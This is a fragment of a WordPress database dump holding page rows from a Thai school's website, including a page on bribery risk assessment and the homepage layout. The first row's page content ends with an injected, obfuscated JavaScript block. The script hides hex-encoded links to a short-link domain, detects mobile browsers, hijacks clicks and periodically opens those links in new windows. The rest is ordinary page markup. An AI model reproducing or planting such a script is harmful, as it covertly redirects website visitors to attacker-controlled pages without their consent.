\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน','','inherit','closed','closed','','1032-revision-v1','','','2024-08-21 09:58:51','2024-08-21 02:58:51','',1032,'http://pakhaeng.ssk.in.th/?p=1034',0,'revision','',0),
(1035,1,'2024-08-21 09:59:58','2024-08-21 02:59:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a 